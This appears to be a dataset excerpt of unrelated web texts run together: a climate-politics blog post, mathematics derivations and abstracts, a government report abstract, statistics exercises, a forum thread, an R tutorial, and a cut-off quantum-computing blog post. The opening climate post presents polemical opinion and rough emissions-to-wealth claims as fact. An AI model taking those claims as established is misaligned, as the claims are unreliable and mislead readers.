text
stringlengths
104
605k
## Tuesday, May 18, 2010 ... // ### Christiana Figueres: new U.N. climate boss Yvo de Boer has resigned as the UNFCCC chief. Christiana Figueres of Costa Rica has been chosen as his successor. To be sure that the same pseudointellectual junk and political propaganda will continue to contaminate this portion of the international political scene, check her "campaign": This transition politically means that the third world could become more influential in these irrational negotitations. That could be bad - but it's very logical. After all, Costa Rica is way ahead of the Netherlands (where Yvo de Boer lives) in the CO2 emissions: the Dutch GDP per capita is $40,000 (PPP) and$48,000 (nominal) while Costa Rica's GDP per capita is just $11,000 (PPP) and$6,400 (nominal), so Costa Rica is approximately five times "better" than the Netherlands. The CO2 emissions per capita are nearly proportional to the GDP per capita - but no one cares about this particular number, anyway. Costa Rica has something like 2 tons of CO2 per capita and year while the Netherlands has 23 tons or so. If you reduce your emissions to 1/10, your wealth will drop to 1/5 or so, which is about 0.7th power of 1/10.
To solve this second order, linear, homogeneous differential equation the unknown function $x(t)$, is written as a power series: $\begin{eqnarray} x(t) &=& \sum_{n=0}^{\infty} a_n t^n \\ \Big( x(t) &=& a_0 + a_1 t + a_2 t^2 + a_3 t^3 + ... \Big) \end{eqnarray}$ The first and second time derivatives of function $x(t)$ thus write: $\begin{eqnarray} \dot{x}(t) &=& \sum_{n=1}^{\infty} n a_n t^{n-1} \\ \Big( \dot{x}(t) &=& a_1 + 2a_2 t + 3a_3 t^2 + ... \Big) \\ \ddot{x}(t) &=& \sum_{n=2}^{\infty} n(n-1)a_n t^{n-2} \\ \Big( \ddot{x}(t) &=& 2a_2 + 6a_3 t + ... \Big) \end{eqnarray}$ Using these expressions for $x(t)$ and $\ddot{x}(t)$ in the equation of motion we get: $\sum_{n=2}^{\infty} n(n-1)a_n t^{n-2} + \omega_0^2 \sum_{n=0}^{\infty} a_n t^n = 0$ The next step is to keep only one sum ($\sum$)... $\sum_{n=0}^{\infty} \Big[ (n+2)(n+1)a_{n+2} + \omega_0^2 a_n \Big] t^n = 0$ Each coefficients should be equal to $0$ for the power series to equal $0$, so that: $(n+2)(n+1)a_{n+2} + \omega_0^2 a_n = 0 \quad \forall n \in N \quad (n = 0,1,2,3,...)$ i.e.: $a_{n+2} = - \frac{a_n \omega_0^2}{(n+2)(n+1)} \quad \forall n \in N \quad (n = 0,1,2,3,...)$ This last recurrence expression together with the initial conditions (chosen as the conditions at time $t=0$) given below allow to solve the equation of motion by finding the value for each coefficient $a_n$: $\begin{eqnarray} a_0 &=& x(0) \qquad \textrm{this is the position at the origin of time}\\ a_1 &=& \dot{x}(0) \qquad \textrm{this is the speed at the origin of time} \\ a_2 &=& - \frac{\omega_0^2}{2 \times 1} a_0 \\ a_3 &=& - \frac{\omega_0^2}{3 \times 2} a_1 \\ a_4 &=& - \frac{\omega_0^2}{4 \times 3} a_2 = \frac{\omega_0^4}{4!} a_0 \\ a_5 &=& - \frac{\omega_0^2}{5 \times 4} a_3 = \frac{\omega_0^4}{5!} a_1 \\ \end{eqnarray}$ and so on. Finally, $x(t)$ is found to be equal to: $\begin{eqnarray} x(t) &=& \sum_{n=0}^{\infty} a_n t^n \\ x(t) &=& a_0 + a_1 t + a_2 t^2 + a_3 t^3 + a_4 t^4 + a_5 t^5 + ... \\ x(t) &=& a_0 + a_1 t - \frac{\omega_0^2}{2!} a_0 t^2 - \frac{\omega_0^2}{3!} a_1 t^3 + \frac{\omega_0^4}{4!} a_0 t^4 + \frac{\omega_0^4}{5!} a_1 t^5 \end{eqnarray}$ Grouping the $a_0$ and $a_1$ terms, we get: $\begin{eqnarray} x(t) &=& a_0 \Big[ 1 - \frac{\omega_0^2 t^2}{2!} + \frac{\omega_0^4 t^4}{4!} - ... \Big] + a_1 \Big[ t - \frac{\omega_0^2 t^3}{3!} + \frac{\omega_0^4 t^5}{5!} - ... \Big] \\ x(t) &=& a_0 \Big[ 1 - \frac{(\omega_0 t)^2}{2!} + \frac{(\omega_0 t)^4}{4!} - ... \Big] + \frac{a_1}{\omega_0} \Big[ t - \frac{(\omega_0 t)^3}{3!} + \frac{(\omega_0 t)^5}{5!} - ... \Big] \\ x(t) &=& a_0 \cos (\omega_0 t) + \frac{a_1}{\omega_0} \sin (\omega_0 t) \end{eqnarray}$ as the expressions between brackets corresponds to the definitions of the cosine and sine functions. The solution of equation of motion is thus: $x(t) = A\cos (\omega_0 t) + B \sin (\omega_0 t)$ where $A$ and $B$ are real quantities defined from the initial conditions. The solution can also be written as: $x(t) = M\cos(\omega_0 t - \alpha) \\$ with $\begin{eqnarray} M &=& \sqrt{A^2+B^2} \\ \tan \alpha &=& \frac{B}{A} \\ A &=& M \cos \alpha \\ B &=& M \sin \alpha \end{eqnarray}$ In a complex form: $x(t) = Ce^{i\omega_O t} + De^{-i\omega_0 t}$ where $\begin{eqnarray} C &=& A/2 + B/(2i) \\ D &=& A/2 - B/(2i) \end{eqnarray}$
RUS  ENG JOURNALS   PEOPLE   ORGANISATIONS   CONFERENCES   SEMINARS   VIDEO LIBRARY   PACKAGE AMSBIB General information Latest issue Forthcoming papers Archive Impact factor Subscription Guidelines for authors License agreement Submit a manuscript Search papers Search references RSS Latest issue Current issues Archive issues What is RSS Mat. Zametki: Year: Volume: Issue: Page: Find Mat. Zametki, 2006, Volume 80, Issue 4, Pages 483–489 (Mi mz2840) Properties of the metric projection on weakly vial-convex sets and parametrization of set-valued mappings with weakly convex images M. V. Balashov, G. E. Ivanov Moscow Institute of Physics and Technology Abstract: We continue studying the class of weakly convex sets (in the sense of Vial). For points in a sufficiently small neighborhood of a closed weakly convex subset in Hilbert space, we prove that the metric projection on this set exists and is unique. In other words, we show that the closed weakly convex sets have a Chebyshev layer. We prove that the metric projection of a point on a weakly convex set satisfies the Lipschitz condition with respect to a point and the Hölder condition with exponent $1/2$ with respect to a set. We develop a method for constructing a continuous parametrization of a set-valued mapping with weakly convex images. We obtain an explicit estimate for the modulus of continuity of the parametrizing function. DOI: https://doi.org/10.4213/mzm2840 Full text: PDF file (411 kB) References: PDF file   HTML file English version: Mathematical Notes, 2006, 80:4, 461–467 Bibliographic databases: UDC: 517.982.252 Citation: M. V. Balashov, G. E. Ivanov, “Properties of the metric projection on weakly vial-convex sets and parametrization of set-valued mappings with weakly convex images”, Mat. Zametki, 80:4 (2006), 483–489; Math. Notes, 80:4 (2006), 461–467 Citation in format AMSBIB \Bibitem{BalIva06} \by M.~V.~Balashov, G.~E.~Ivanov \paper Properties of the metric projection on weakly vial-convex sets and parametrization of set-valued mappings with weakly convex images \jour Mat. Zametki \yr 2006 \vol 80 \issue 4 \pages 483--489 \mathnet{http://mi.mathnet.ru/mz2840} \crossref{https://doi.org/10.4213/mzm2840} \mathscinet{http://www.ams.org/mathscinet-getitem?mr=2314356} \zmath{https://zbmath.org/?q=an:1117.52001} \elib{http://elibrary.ru/item.asp?id=9293153} \transl \jour Math. Notes \yr 2006 \vol 80 \issue 4 \pages 461--467 \crossref{https://doi.org/10.1007/s11006-006-0163-y} \isi{http://gateway.isiknowledge.com/gateway/Gateway.cgi?GWVersion=2&SrcApp=PARTNER_APP&SrcAuth=LinksAMR&DestLinkType=FullRecord&DestApp=ALL_WOS&KeyUT=000241868700022} \scopus{http://www.scopus.com/record/display.url?origin=inward&eid=2-s2.0-33750337465} • http://mi.mathnet.ru/eng/mz2840 • https://doi.org/10.4213/mzm2840 • http://mi.mathnet.ru/eng/mz/v80/i4/p483 SHARE: Citing articles on Google Scholar: Russian citations, English citations Related articles on Google Scholar: Russian articles, English articles This publication is cited in the following articles: 1. G. E. Ivanov, M. V. Balashov, “Lipschitz continuous parametrizations of set-valued maps with weakly convex images”, Izv. Math., 71:6 (2007), 1123–1143 2. Ivanov G. E., “Continuous selections of multifunctions with weakly convex values”, Topology Appl., 155:8 (2008), 851–857 3. Goncharov V.V., Pereira F.F., “Neighbourhood retractions of nonconvex sets in a Hilbert space via sublinear functionals”, J. Convex Anal., 18:1 (2011), 1–36 4. Goncharov V.V., Pereira F.F., “Geometric Conditions for Regularity in a Time-Minimum Problem with Constant Dynamics”, J. Convex Anal., 19:3 (2012), 631–669 5. Goncharov V.V., Ivanov G.E., “Strong and Weak Convexity of Closed Sets in a Hilbert Space”, Operations Research, Engineering, and Cyber Security: Trends in Applied Mathematics and Technology, Springer Optimization and Its Applications, 113, eds. Daras N., Rassias T., Springer International Publishing Ag, 2017, 259–297 6. Balashov M.V., “About the Gradient Projection Algorithm For a Strongly Convex Function and a Proximally Smooth Set”, J. Convex Anal., 24:2 (2017), 493–500 7. Lopushanski M.S., “Normal Regularity of Weakly Convex Sets in Asymmetric Normed Spaces”, J. Convex Anal., 25:3 (2018), 737–758 8. M. V. Balashov, “Uslovie Lipshitsa metricheskoi proektsii v gilbertovom prostranstve”, Fundament. i prikl. matem., 22:1 (2018), 13–29 9. M. V. Balashov, “The Pliś metric and Lipschitz stability of minimization problems”, Sb. Math., 210:7 (2019), 911–927 • Number of views: This page: 454 Full text: 153 References: 41 First page: 2
dc.contributor.author Office of the Inspector General dc.date.accessioned 2020-11-25T15:14:41Z dc.date.available 2020-11-25T15:14:41Z dc.date.issued 1989-01-01 dc.identifier.other 11659082 dc.identifier.uri https://hdl.handle.net/1813/77917 dc.description.abstract [Excerpt] This is the twenty-first Semiannual Report of the U.S. Department of Labor's Office of Inspector General (OIG). I am issuing it in accordance with the provisions of the Inspector General Act of 1978 (P.L. 95-452). The Congress made clear its intent in this Act that the Inspector General should be a leading force in detecting, investigating and preventing fraud, waste, and abuse in or affecting the programs administered by this Department. I look back with considerable satisfaction on the accomplishments of the OIG during the 6-year period since I was nominated by President Reagan to be the Inspector General. I am pleased to be associated with many well motivated employees of the Department of Labor who have contributed to these efforts, but I am especially indebted to the highly dedicated professionals and support staff of the OIG who have worked so tirelessly with what has too often been too little public appreciation of their work. They have worked to improve the management and operations of the Department of Labor, thereby saving or recovering vast sums of Federal funds and helping to convict numerous individuals for serious violations of Federal criminal laws. During this 6-year period, OIG auditors questioned the expenditure of over $1 billion. More than half of this was determined by the Department to have been improperly expended and recovery was sought. Over this same 6-year period, nearly 4,700 criminal indictments and 3,600 convictions resulted from our investigative work. These investigations also .produced over$100 million in fines, penalties, restitutions, settlements, recoveries, and cost efficiencies. Over this 6-year period, a good portion of this success is attributable to the history of support and cooperat!on that my Office has received from the Department's management and employees. Recently, however, I fear that the OIG has been experiencing something of a significant shift that may not bode well for future cooperation in audits and investigations. Where speedy cooperation was once encouraged by top-level Department of Labor management, our requests for information or assistance are now too often subjected to a protracted delay. Today, questions about OIG authority, requests for clarifications, requests for opinions or rulings from the Solicitor or DOJ, or other such actions are routinely used to frustrate any audit or investigative activity that does not fit the current, narrow view of OIG authority that has been held by certain departmental officials. Furthermore, I am concerned about the effectiveness of the Department's enforcement of law designed to protect the pension and benefit plans, but am heartened with the Secretary's recent statement, "Developing a sound, comprehensive pension and retirement policy is among the Department's most important responsibilities and one of my top priorities." The Department has been entrusted with a responsibility and it must keep that trust. To paraphrase President Bush, when the Government says something, it must mean it. It must keep its word, its promise, its vow to the American people. This means enforcing the criminal as well as the civil provisions of those laws entrusted to it by the Congress and the American people. I am hopeful that the placement of appointees in the new Administration will lead us back to a positive environment in which we all shall strive to meet the difficult challenges confronting the American worker. To be successful in this endeavor, Secretary Dole must have the benefit of the talents and energies of all of the Department's organizations and employees. I trust that this report will, in addition, help the Secretary assure that a well balanced and effective enforcement program is one of the first steps taken to create a comprehensive pension policy. The OIG will continue to monitor and report on actions taken by DOL management to address and resolve these serious problems. dc.language.iso en_US dc.subject Office of the Inspector General dc.subject Department of Labor dc.subject audit dc.subject employee integrity dc.subject fraud dc.subject Congress dc.title Semi-Annual Report to Congress for the Period of October 1, 1988 - March 31, 1989 dc.type unassigned dc.description.legacydownloads OIG_Semiannual_Report_to_Congress_v21.pdf: 34 downloads, before Oct. 1, 2020. local.authorAffiliation Office of the Inspector General: True 
Roll n fair dice, and let Xn be the maximum number that is rolled. (a) [12pts] Compute E[Xn] as a function of n. (b) [4pts] What is lim(n-> inf) E[Xn]?
13 Jul 2015 # Objective This was our exercise on the first day covering hypothesis testing for two independent populations. I wanted students to come up on their own with the form of a two-population hypothesis test, and with a basic idea of the test statistic. Everyone nailed $H_0: \mu_S = \mu_T$. Wording of the second and third questions was intentionally vague to make the students think. It was partially successful - several groups originally wrote that tunder the null hypothesis, the stiffness of the samples is the same, even though the data contradicts that statement. After some leading questions they all got to the statement that the difference in sample means should tend to be small under the null. Some groups rushed through and tried to calculate t-statistics for the third question, which was specifically against my wishes (and they didn’t yet know what they were doing). However, a couple of groups did well and suggested either a t-test somehow based on ${\bar S} - {\bar T}$ (which was exactly what I wanted to hear), or a permutation test (which was beyond what I hoped they would come up with). # Exercise ## Setup We have talked several times about using data to test whether the expectation of a population is equal to some value. We tended to write the null hypothesis like this: Now, imagine that you work at a bicycle factory where you’d like to replace steel tubes in the company’s bicycle frames with titanium (because it’s lighter). You have carefully selected random samples of the steel and titanium tubes from your suppliers. You measure the stiffness of each tube in a testing rig. The data are (measured in pounds per square inch, psi): ## Question • In order for the bicycles to perform the same after the switch, you would like to have tubes with identical stiffness. How might you write down the null hypothesis that the expected stiffness is the same between the two groups? • If the null hypothesis is true, then what can we say about the samples of steel and titanium tubes? • Can you construct a test statistic that would be useful for testing these hypotheses? Brainstorm as many ideas as you can, but don’t bother with calculations.
Access You are not currently logged in. Access your personal account or get JSTOR access through your library or other institution: If You Use a Screen Reader This content is available through Read Online (Free) program, which relies on page scans. Since scans are not currently available to screen readers, please contact JSTOR User Support for access. We'll provide a PDF copy for your screen reader. On the Zeros of the Riemann Zeta Function in the Critical Strip Richard P. Brent Mathematics of Computation Vol. 33, No. 148 (Oct., 1979), pp. 1361-1372 DOI: 10.2307/2006473 Stable URL: http://www.jstor.org/stable/2006473 Page Count: 12 Preview not available Abstract We describe a computation which shows that the Riemann zeta function $\xi(s)$ has exactly 75,000,000 zeros of the form $\sigma + it$ in the region $0 < t < 32,585,736.4;$ all these zeros are simple and lie on the line $\sigma = \frac{1}{2}$. (A similar result for the first 3,5000,000 zeros established by Rosser, Yohe and Schoenfeld.) Counts of the number of Gram blocks of various types and the number of failures of "Rosser's rule" are given. • 1361 • 1362 • 1363 • 1364 • 1365 • 1366 • 1367 • 1368 • 1369 • 1370 • 1371 • 1372
# Easy Sequence 1. Sep 28, 2007 ### Howers x^n/n! -> 0 as n-> +oo I got 2 texts that explain this in 2 lines. A lot of steps skipped as you can imagine. Can anyone prove this in toddler language? 2. Sep 29, 2007 ### robert Ihnot I see you mean: (x^n)/n!. Let's suppose J is the next largest integer to x, and consider the larger value of (j^n)/n!, now when n=j, we have (j^j)/j!, where only the last term is j/j=1. But, develope a second part of the series (j^j/j!)(j^j)(2j!/j!), this second product is of the form: $$\prod_{i=1+j}^{2j}\frac{j}{i}$$ in which every term is less than 1, but we can continue to increase n to 3j producing another product: $$\prod_{i=2j+1}^{3j}\frac{j}{i}$$ producing a even smaller product, etc. Multiplying these products all together as n becomes boundless gives us our result. Last edited: Sep 29, 2007 3. Sep 29, 2007 ### Gib Z Or we could just note that n! grows much faster than x^n for any finite x. We can see this by looking at subsequent terms of the sequence. If x is some finite number, as soon as you get past the x-th term, the denominator is multiplying by numbers larger than x, whilst the denominator is still multiplying by x.
MathSciNet bibliographic data MR1687331 (2000j:68062) 68Q17 Håstad, Johan Clique is hard to approximate within $n\sp {1-\epsilon}$$n\sp {1-\epsilon}$. Acta Math. 182 (1999), no. 1, 105–142. Article For users without a MathSciNet license , Relay Station allows linking from MR numbers in online mathematical literature directly to electronic journals and original articles. Subscribers receive the added value of full MathSciNet reviews.
# How to return a logical value for a t test based on 0.05 level of significance in R? To return a logical value for a t test based on 0.05 level of significance in R, we can follow the below steps − • First of all, create a data frame with one column. • Apply t.test function with ifelse to return logical value based on 0.05 level of significance. ## Example1 Create the data frame Let's create a data frame as shown below − Live Demo x<-rnorm(20) df1<-data.frame(x) df1 On executing, the above script generates the below output(this output will vary on your system due to randomization) −       x 1 0.44038858 2 1.08938356 3 -0.23627885 4 0.73953751 5 -0.55476732 6 0.97726848 7 0.25612436 8 -1.89827676 9 0.50333232 10 0.55482166 11 1.83279952 12 0.93609228 13 0.35048901 14 0.05136088 15 -0.89102106 16 1.06392349 17 -0.15777431 18 0.45506977 19 1.43752763 20 1.27393923 ## Apply t.test to get the logical return Using t.test with ifelse to return logical output based on significance level 0.05 for less than alternative − Live Demo x<-rnorm(20) df1<-data.frame(x) ### Output [1] "No"
A new paper with Chaowen Guan Chaowen Guan is a PhD student at Buffalo. After a busy end to the Spring 2019 term at UB, we are getting time to write about our paper, “Stabilizer Circuits, Quadratic Forms, and Computing Matrix Rank.” Today we emphasize new connections we have found between simulating special quantum circuits and computing matrix rank over the field ${\mathbb{F}_2}$. The quantum circuits involved have been known as polynomial-time solvable since 1998. They are not universal but form important building blocks of quantum systems people intend to build. They impact the problem of showing quantum circuits are more powerful than classical circuits—the quantum advantage problem—in terms of how much harder quantum stuff must be added to them. The question is: How efficiently can we simulate these special circuits? Our answer improves the bound from order-${n^3}$ to ${n^{\omega}}$, where ${\omega}$ here means the current best-known exponent for multiplying ${n \times n}$ matrices (over ${\mathbb{F}_2}$ or any field). Today ${\omega}$ stands at ${2.3728\dots}$. The non-quantum problem of counting solutions to a quadratic polynomial ${f(x_1,\dots,x_n)}$ modulo 2 is likewise improved from the ${O(n^3)}$ shown by Andrzej Ehrenfeucht and Marek Karpinski to ${O(n^\omega)}$. This comes at a price, however, because the matrix multiplication algorithms that optimize the exponent are galactic. In this post we’ll emphasize what is not galactic: reductions to and from the problem of computing matrix rank that run in linear time—meaning ${O(n^2)}$ time for dense matrices—except for the need to check a yes/no condition in one of them. All this builds on the algebraic methods in our paper last year with Amlan Chakrabarti of the University of Calcutta. Chaowen has contributed a post and some other materials for this blog. His work first came up in a post three years ago that saluted Dick and Kathryn’s wedding. Today is their third anniversary—so this post also comes with happy anniversary wishes. ## Strong Simulation Problems We have covered quantum algorithms several times. We discussed stabilizer circuits in an early post on the work with Amlan and covered them more recently in connection with the work of Jin-Yi Cai’s group. Suffice it to say that stabilizer circuits—which extend Clifford circuits by allowing intermediate measurement gates—form the most salient case that classical computers can simulate in polynomial time. The simulation time is sometimes cited as ${O(n^2)}$ going back to a 2004 paper by Scott Aaronson and Daniel Gottesman, but there is a catch: this is only for one measurement of one qubit. For general (non-sparse) instances, all of various other algorithms need order-${n^2}$ time to re-organize their data structures after each single-qubit measurement. This is so even if one merely wants to measure all ${n}$ qubits in one shot: the time becomes ${O(n^3)}$. This is one case of what is generally called a strong simulation. It is precisely this time that Chaowen and I improved to ${O(n^\omega)}$. In wider contexts, strong simulation of a quantum circuit ${C}$ means the ability to compute the probability of a given output to high precision. When the input and output are both in ${\{0,1\}^n}$ we may suppose both are ${0^n}$ since we can prepend and append ${\mathsf{NOT}}$ gates to ${C}$. Then strong simulation means computing the amplitude ${\langle 0^n |C| 0^n \rangle}$ (or computing ${|\langle 0^n |C| 0^n \rangle|^2}$ which is the output probability) to ${n}$-place precision. It doesn’t take much for this to be ${\mathsf{NP}}$-hard, often ${\mathsf{\#P}}$-complete. If we take the Clifford generating set $\displaystyle \mathsf{H} = \frac{1}{\sqrt{2}}\begin{bmatrix} 1 & 1 \\ 1 & -1 \end{bmatrix},\quad \mathsf{CZ} = \begin{bmatrix} 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & -1 \end{bmatrix},\quad \mathsf{S} = \begin{bmatrix} 1 & 0 \\ 0 & i \end{bmatrix},$ then we can get universal circuits by adding any any one of the following gates: $\displaystyle \mathsf{T} = \begin{bmatrix} 1 & 0 \\ 0 & \sqrt{i} \end{bmatrix},\quad \mathsf{CS} = \begin{bmatrix} 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & i \end{bmatrix},\quad \mathsf{Tof} = \mathit{diag}(1,1,1,1,1,1,\begin{bmatrix} 0 & 1 \\ 1 & 0 \end{bmatrix}).$ In the last one we’ve portrayed the ${8 \times 8}$ matrix of the Toffoli gate as being block-diagonal. We will later consider block-diagonal matrices permuted so that all ${2 \times 2}$ “blocks” are at upper left. There is much recent literature on trying to simulate circuits with limited numbers of non-Clifford gates, and on how many such gates may be needed for exponential lower bounds—even just to tell whether ${\langle 0^n |C| 0^n \rangle \neq 0}$. This plays against a wider context of efforts toward quantum advantage. Chaowen and I have been trying to apply algebraic-geometric techniques for new lower bounds at the high end, but this time we found new upper bounds at the low end. ## From Matrix Rank to Quantum It is not known how to compute the rank ${rk(A)}$ of a dense matrix ${A}$ in better than matrix-multiplication time, even over ${\mathbb{F}_2}$. We may suppose ${A}$ is square and symmetric, since we can always form the block matrix $\displaystyle A' = \begin{bmatrix} 0 & A^\top \\ A & 0 \end{bmatrix}$ and then ${rk(A) = \frac{1}{2}rk(A')}$. In the case of ${\mathbb{F}_2}$, ${A'}$ is the adjacency matrix ${A_G}$ of an undirected bipartite graph ${G}$. The rank of ${A_G}$ for any undirected graph ${G = (V,E)}$ must be even. Whereas the rank of the ${|V| \times |E|}$ vertex-edge incidence matrix always equals ${n}$ minus the number of connected components of ${G}$, less is known about characterizing ${rk(A_G)}$. Our first main theorem brings quantum strong simulation into the picture. Let ${N}$ stand for ${n^2}$. Theorem 1 Given any ${A \in \mathbb{F}_2^{n \times n}}$ we can construct in ${O(N)}$ time a stabilizer circuit ${C}$ on ${2n}$ qubits such that $\displaystyle rk(A) = \log_2(|\langle 0^{2n} |C| 0^{2n} \rangle|).$ One interpretation is that if you believe matrix rank is a “mildly hard” function (with regard to ${O(N)}$-time computability) then predicting the result of measuring all the qubits in a stabilizer circuit is also “mildly hard.” Such mild hardness would represent a gap between the ${O(n^2)}$ time for weak simulation and the time for strong simulation. Such gaps have been noted and proved for extensions of stabilizer circuits but those are between “polynomial” and an intractable hardness notion. One can also view Theorem 1 as a possible avenue toward computing matrix rank without doing either matrix multiplication or Gaussian elimination. This is the view Chaowen and I have had all along. ## From Quantum to Rank The distinguishing point of our converse reduction to the rank ${r}$ is knowledge of normal forms that depend on ${r}$ where one can use the knowledge to delay or avoid computing them explicitly. The normal forms are for polynomials ${f_C}$ associated to quantum circuits ${C}$ in our earlier work. Stabilizer circuits yield ${f_C}$ as a classical quadratic form over ${\mathbb{Z}_4}$, the integers modulo ${4}$. That is, all cross terms ${x_i x_j}$ in ${f_C}$ have even coefficients—here, ${0}$ or ${2}$. Thus quantum computing enters a debate that occupied Carl Gauss and others over two hundred years ago: Should every homogeneous quadratic polynomial ${f(x_1,\dots,x_n)}$ with integer coefficients be called a quadratic form, or only those whose cross terms ${c_{i,j}x_i x_j}$ all have even coefficients ${c_{i,j}}$? The point of even coefficients is that they enable having a symmetric ${n \times n}$ integer matrix ${S}$ such that $\displaystyle f(x) = x^\top S x$ for all ${x}$. Without that condition, ${S}$ might only be half-integral. This old difference turns out to mirror that between universal quantum computing and classical, because the non-Clifford ${\mathsf{CS}}$-gate noted above yields circuits ${C}$ whose ${f_C}$ over ${\mathbb{Z}_4}$ have terms ${x_i x_j}$ and/or ${3 x_i x_j}$. While counting solutions in ${\mathbb{Z}_4^n}$ for those polynomials is in ${\mathsf{P}}$, counting their binary solutions is ${\mathsf{\#P}}$-complete—an amazing dichotomy we expounded here. We hasten to add that for ${k = 2}$ the classical forms coincide with those over ${\mathbb{Z}_{2^k}}$ whose nonzero cross terms all have coefficient ${2^{k-1}}$. Those are called affine in the work by Jin-Yi and others noted above, and our above-mentioned post noted his 2017 paper with Heng Guo and Tyson Williams giving another proof of polynomial-time simulation of stabilizer circuits via ${f_C}$ being affine. Our work improving the polynomial bounds, however, draws on a 2009 paper by Kai-Uwe Schmidt and further theory of classical quadratic forms. This paper uses work going back to 1938 that decomposes a classical (affine) quadratic form ${f}$ over ${\mathsf{Z}_4}$ further as $\displaystyle f(x) = f_0(x) + 2(x \bullet v) \quad\text{with}\quad f_0(x) = x^\top B x, \ \ \ \ \ (1)$ for binary arguments ${x}$. Here ${v}$ is a binary vector with ${v_i = 1}$ if ${S[i,i] = 2}$ or ${S[i,i] = 3}$, ${v_i =0}$ otherwise, and the operations including the inner product ${\bullet}$ are mod-2 except that the final ${+}$ is in ${\mathbb{Z}_4}$. Then ${f}$ is alternating if the diagonal of ${B}$ is all-zero, non-alternating otherwise. Now take ${r}$ to be the rank of ${B}$. The key normal-form lemma is: Lemma 2 There is a change of basis to ${y_1,\dots,y_n}$ such that if ${f}$ is non-alternating then ${f_0}$ is transformed to $\displaystyle f'_0(y) = y_1 + y_2 + \cdots + y_r,$ whereas if ${f}$ is alternating then ${r}$ is even and ${f_0}$ is transformed to $\displaystyle f'_0(y) = 2y_1 y_2 + 2y_3 y_4 + \cdots + 2y_{r-1} y_r.$ In either case, there is a binary vector ${w}$ so that ${f(y) = f'_0(y) + 2(y \bullet w)}$ for all ${y}$. The point is that to evaluate the quantum circuit ${C}$, we don’t need to evaluate ${f_C}$, but can make inferences about the structure of the solution sets to ${f_C(x) = a}$ for ${a = 0,1,2,3 \pmod{4}}$, where ${x \in \{0,1\}^n}$. Given the knowledge of ${r}$, the normal form goes a long way to this. The vector ${w}$ is also needed, but the fact of its having only ${n}$ bits gives hope of finding it in ${O(n^2) = O(N)}$ time. That—plus an analysis of the normal form ${f'_0,w}$ itself of course—would complete an ${O(N)}$-time reduction from computing the amplitude to computing ${r}$. ## The Needed Piece—For Now Chaowen took the lead all through the Fall 2018 term in trying multiple attacks. In the non-alternating case, the change of basis converts ${B}$ into a diagonal matrix ${D}$ over ${\mathbb{F}_2}$. In the alternating case, the same process makes ${D}$ a block-diagonal matrix of the kind we mentioned above. The conversion ${D = Q B Q^\top}$ in both cases also yields ${w}$. Of course ${Q}$ can be computed by Gaussian elimination in ${O(n^3)}$ time, but this is what we wanted to avoid. After poring over older literature on ${n^\omega}$-time methods, including a 1974 paper by James Bunch and John Hopcroft (see also this), we found a paper from last year by Jean-Guillaume Dumas and Clément Pernet that gives exactly what we needed: an LDU-type decomposition that yields ${D}$ in ${O(n^\omega)}$ time. We only needed to apply the change-of-basis analysis in Schmidt’s paper to this decomposition and combine with the normal-form analysis to establish our algorithm for computing the amplitude ${\langle 0^n |C| 0^n \rangle}$: 1. Convert ${C}$ to the classical quadratic form ${f_C}$ with matrix ${S}$ over ${\mathbb{Z}_4}$ and associate the ${n \times n}$ matrix ${B}$ over ${\mathbb{Z}_2}$ as above. This needs only ${O(N)}$ time. 2. Compute the Dumas-Pernet decomposition ${B = PLDL^\top P^\top}$ over ${\mathbb{Z}_2}$ where ${P}$ is a permutation matrix, ${L}$ is lower-triangular, and ${D}$ is block-diagonal with blocks that are either ${1 \times 1}$ or ${2 \times 2}$. Of course, this involves computing the rank ${r}$ of ${B}$ and takes ${O(n^\omega)}$ time. Think of it as ${D = QBQ^\top}$. This takes ${O(n^\omega)}$ time—indeed, ${O(n^2 r^{\omega - 2})}$ time according to Dumas and Pernet. 3. Compute ${D' = Q S Q^\top}$ over ${\mathbb{Z}_4}$. This, too, takes ${O(n^\omega)}$ time. 4. If any diagonal ${1 \times 1}$ block of the original ${D}$ has become ${2}$ in ${D'}$, output ${\langle 0^n |C| 0^n \rangle = 0}$. Else, ${\langle 0^n |C| 0^n \rangle}$ is nonzero and we have enough information about ${D}$ and ${w}$ to find it—in only ${O(n)}$ time, in fact. This proves our main theorem: Theorem 3 For stabilizer circuits ${C}$, ${\langle 0^n |C| 0^n \rangle}$ is computable in ${O(n^\omega)}$ time. So is counting binary solutions to a classical quadratic form over ${\mathbb{Z}_4}$, or any quadratic polynomial mod 2. Because we use the decomposition, the above is not a clean ${O(N)}$-time reduction to computing ${r}$. It does not make Theorem 3 into a linear-time equivalence. By further analysis, however, we show that the only impediment is needing ${D'}$ in step 4 of our algorithm to tell whether ${\langle 0^n |C| 0^n \rangle = 0}$. If we are promised that it is nonzero, then we obtain the probability ${|\langle 0^n |C| 0^n \rangle|^2}$ in ${O(N)}$ time from ${r}$ alone. This is actually where the power of Chaowen’s analysis of the normal forms is brightest and neatest. We will devote further posts to this and to illuminating further connections in graph and matroid theory. ## A Three-Part Example Consider the following quantum circuit ${C}$. OK, this is a very low-tech drawing. Besides the six Hadamard gates it has two ${\mathsf{CZ}}$ gates, which are shown as simple bars since they are symmetric: By the rules given here, the three Hadamard gates at left introduce “nondeterministic variables” ${x_1,x_2,x_3}$. The three Hadamard gates at right also give nondeterministic variables, but they are immediately equated to the output variables ${z_1,z_2,z_3}$ so we skip them. The polynomial ${q_C}$ is $\displaystyle 2u_1 x_1 + 2u_2 x_2 + 2u_3 x_3 + 2x_1 x_2 + 2 x_2 x_3 + 2 x_1 z_1 + 2 x_2 z_2 + 2 x_3 z_3.$ Upon substituting ${0}$ for all of ${u_1,u_2,u_3}$ and ${z_1,z_2,z_3}$ this gives simply ${f(x) = 2x_1 x_2 + 2 x_2 x_3}$. This is an alternating form with $\displaystyle S = B = \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 1 \\ 0 & 1 & 0 \end{bmatrix},$ which is the adjacency matrix of the path graph of length 2 on ${n = 3}$ vertices. Gaussian elimination does not need any prior swaps, so the permutation matrix ${P}$ in the decomposition is the identity and we get $\displaystyle Q = \begin{bmatrix} 1 & 0 & 0 \\ 0 & 1 & 0 \\ 1 & 0 & 1 \end{bmatrix}, \quad\text{giving}\quad D = QBQ^\top = \begin{bmatrix} 0 & 1 & 0 \\ 1 & 0 & 0 \\ 0 & 0 & 0 \end{bmatrix}$ as the block-diagonal matrix over ${\mathbb{Z}_2}$. Now we re-compute the products over ${\mathbb{Z}_4}$ to get $\displaystyle Q S Q^{\top} 